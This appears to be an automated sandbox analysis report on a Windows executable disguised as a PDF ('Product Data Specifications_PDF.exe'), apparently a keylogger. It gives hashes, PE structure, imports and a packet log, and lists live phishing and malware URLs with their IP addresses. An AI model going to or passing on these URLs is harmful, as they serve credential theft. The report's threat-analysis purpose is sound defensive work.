• https://ldubsinvesting.com/a/g/bqcfb/bwviud/YW1hbmRhLnlhcEBleGlzLXRlY2guY29t (malicious, HTMLPhisher): 198.54.115.105
• https://recommendationshaft-facc4a.ingress-comporellon.ewp.live/wp-content/plugins/Suspendisse-vitae/pages/region.php (malicious, Unknown): 63.250.43.6
• https://zerovoid-voidic-facc4a.ingress-erytho.ewp.live/wp-content/plugins/Suspendisse%20vitae/pages/region.php (malicious, Unknown): 63.250.43.132
• https://yw2tr-d6987d.ingress-bonde.ewp.live/wp-content/plugins/deviswetransfer%202/log.php (malicious, Unknown): 63.250.43.2
• https://dji.repair/wnfslydy.php (malicious, Unknown): 162.0.238.241
• inquiry.exe (malicious, Snake Keylogger, VIP Keylogger): 192.64.117.204
Process: C:\Windows\SysWOW64\cmdl32.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: modified
Size (bytes): 196608
Entropy (8bit): 1.1215420383712111
Encrypted: false
SSDEEP: 384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5: 9A809AD8B1FDDA60760BB6253358A1DB
SHA1: D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256: 95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512: 2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious: false
Reputation: moderate, very likely benign file
                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\Product Data Specifications_PDF.exe
File Type: data
Category: modified
Size (bytes): 288768
Entropy (8bit): 7.994114653162179
Encrypted: true
SSDEEP: 3072:wimkZb1nEv150OKEybH7B3a7I/8HKuJ+xddfKyWz3P62ffFtCaFOIDB7fQVQXsI4:dm8nNbB3as09+xddiySP6YtCODWfB/08
MD5: 1E97CB7AB05D0719CF8A43198215FB3C
SHA1: 0649A35C2F3008CE35020775B0A4B068DFFCA76C
SHA-256: 1CAE3A07FE2732CB4F88BAC2173144F2778D017E66CCE103001494CCC72AE440
SHA-512: 38917BD3F71D3897F5D075A9B779481E270EEC1059EA183E13023E37C2A4324A00C00FABAE22DE10A69F868DF2D710294BAFAE032A49668D3E1D60816EAC47C2
Malicious: false
Reputation: low
                            Preview:.....NCXM..S....{.T[..pNM...8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXM.JFZ6G.9G.].g.B..d..3Kx4E(6&9+n 9#+%2zZ=dE2?t1(n...e')>]vI:MuTXFNCXM<KO..8#.z13.{.$.W..`X?.-...d&).B..z:_..^$9i8!.CXMEJFZ8..7G.UYF....EJFZ8XD7.QVYMOHXM.NFZ8XD7GQT.RNCX]EJF*<XD7.QTHFNCZMELFZ8XD7GWTXFNCXME:BZ8ZD7GQTXDN..MEZFZ(XD7GATXVNCXMEJVZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCv9 22Z8X@bCQTHFNC.IEJVZ8XD7GQTXFNCXMeJF:8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.526936847926212
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Product Data Specifications_PDF.exe
File size: 1'335'877 bytes
MD5: 94cc1457803df28f1d4c7a39db96e956
SHA1: 0b1f19f44e162dcc5e06d5619b0e72d3e654293b
SHA256: 64f6025326f3f7edca173d44ef56a85198b28c132b7e0afd3b599ccc3b593624
SHA512: 992d7b45b4f870e83723acdd748e24b492edbc4951720ecad7581cab7cbc617e10554b24d75c55649100ab3728e652808314ce3bee8efd55a9fccd8d259bc0f5
SSDEEP: 24576:uRmJkcoQricOIQxiZY1iaCMNJY88f8po1dSD9lIFd97:7JZoQrbTFZY1iaCMNJY8e8pofSD9Of1
TLSH: 7755F121F5C58036C2B323B19E7EF76A963979360336D2D727C82E315EA05416B2A773
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
Icon Hash: 1733312925935517
Entrypoint: 0x4165c1
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: d3bf8a7746a8d1ee8f6e5960c3f69378
                            Instruction
                            call 00007F3B98EF7D7Bh
                            jmp 00007F3B98EEEBEEh
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            push edi
                            push esi
                            mov esi, dword ptr [ebp+0Ch]
                            mov ecx, dword ptr [ebp+10h]
                            mov edi, dword ptr [ebp+08h]
                            mov eax, ecx
                            mov edx, ecx
                            add eax, esi
                            cmp edi, esi
                            jbe 00007F3B98EEED6Ah
                            cmp edi, eax
Programming Language:
• [ C ] VS2010 SP1 build 40219
• [C++] VS2010 SP1 build 40219
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x8d41c         | 0x154        | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xab000         | 0x9328       | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x82000         | 0x844        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type | Entropy            | Characteristics
.text  | 0x1000          | 0x8061c      | 0x80800  | 61ffce4768976fa0dd2a8f6a97b1417a | False    | 0.5583182605787937  | data      | 6.684690148171278  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000         | 0xdfc0       | 0xe000   | 0354bc5f2376b5e9a4a3ba38b682dff1 | False    | 0.36085728236607145 | data      | 4.799741132252136  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0x90000         | 0x1a758      | 0x6800   | 8033f5a38941b4685bc2299e78f31221 | False    | 0.15324519230769232 | data      | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0xab000         | 0x9328       | 0x9400   | 495451d7eb8326bd9fa2714869ea6de8 | False    | 0.49002322635135137 | data      | 5.541804843154628  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name          | RVA     | Size   | Type                                                                                  | Language | Country       | ZLIB Complexity
RT_ICON       | 0xab5c8 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors   | English  | Great Britain | 0.3277027027027027
RT_ICON       | 0xab6f0 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 192                        | English  | Great Britain | 0.7466216216216216
RT_ICON       | 0xab818 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 192                        | English  | Great Britain | 0.3885135135135135
RT_ICON       | 0xab940 | 0x668  | Device independent bitmap graphic, 48 x 96 x 4, image size 1152                       | English  | Great Britain | 0.48109756097560974
RT_ICON       | 0xabfa8 | 0x2e8  | Device independent bitmap graphic, 32 x 64 x 4, image size 512                        | English  | Great Britain | 0.5672043010752689
RT_ICON       | 0xac290 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 128                        | English  | Great Britain | 0.6418918918918919
RT_ICON       | 0xac3b8 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English  | Great Britain | 0.7044243070362474
RT_ICON       | 0xad260 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English  | Great Britain | 0.8077617328519856
RT_ICON       | 0xadb08 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors  | English  | Great Britain | 0.5903179190751445
RT_ICON       | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600                      | English  | Great Britain | 0.5503112033195021
RT_ICON       | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224                      | English  | Great Britain | 0.6050656660412758
RT_ICON       | 0xb16c0 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 1088                      | English  | Great Britain | 0.7553191489361702
RT_MENU       | 0xb1b28 | 0x50   | data                                                                                  | English  | Great Britain | 0.9
RT_DIALOG     | 0xb1b78 | 0xfc   | data                                                                                  | English  | Great Britain | 0.6507936507936508
RT_STRING     | 0xb1c78 | 0x530  | data                                                                                  | English  | Great Britain | 0.33960843373493976
RT_STRING     | 0xb21a8 | 0x690  | data                                                                                  | English  | Great Britain | 0.26964285714285713
RT_STRING     | 0xb2838 | 0x4d0  | data                                                                                  | English  | Great Britain | 0.36363636363636365
RT_STRING     | 0xb2d08 | 0x5fc  | data                                                                                  | English  | Great Britain | 0.3087467362924282
RT_STRING     | 0xb3308 | 0x65c  | data                                                                                  | English  | Great Britain | 0.34336609336609336
RT_STRING     | 0xb3968 | 0x388  | data                                                                                  | English  | Great Britain | 0.377212389380531
RT_STRING     | 0xb3cf0 | 0x158  | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0                      | English  | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84   | data                                                                                  | English  | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14   | data                                                                                  | English  | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14   | data                                                                                  | English  | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14   | data                                                                                  | English  | Great Britain | 1.25
RT_VERSION    | 0xb3f18 | 0x19c  | data                                                                                  | English  | Great Britain | 0.5339805825242718
RT_MANIFEST   | 0xb40b8 | 0x26c  | ASCII text, with CRLF line terminators                                                | English  | United States | 0.5145161290322581
DLL: Imports
WSOCK32.dll: __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll: VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll: WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll: InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL: EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll: CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll: HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll: GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll: DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll: DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll: VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
English                        | Great Britain
English                        | United States
                            Sep 26, 2024 15:25:50.619574070 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.619924068 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.619947910 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.619963884 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.619978905 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620104074 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620119095 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620134115 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620136023 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.620176077 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.620277882 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.620722055 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620738029 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620754004 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620846033 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.620868921 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620883942 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.621282101 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.621646881 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.621665001 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.621680975 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.621716976 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.621727943 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.621727943 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.621733904 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.622400999 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.622457027 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.622632980 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.622724056 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.625173092 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.625204086 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.625221014 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.625308037 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.706592083 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706671000 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706707954 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706742048 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706779003 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706831932 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706851006 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.706870079 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706902981 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706937075 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706964016 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.706969023 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707000017 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.707000017 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.707004070 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707045078 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707077980 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707110882 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707149029 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707176924 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.707461119 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707518101 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707570076 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707597971 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.707603931 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707638979 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707674026 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707703114 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.707715988 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707750082 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707783937 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707812071 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.707817078 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707854986 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707933903 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.708326101 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708383083 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708415985 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708467960 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708496094 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.708499908 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708534956 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708569050 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708591938 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.708604097 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708642006 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708673954 CEST8049721208.91.197.27192.168.2.7
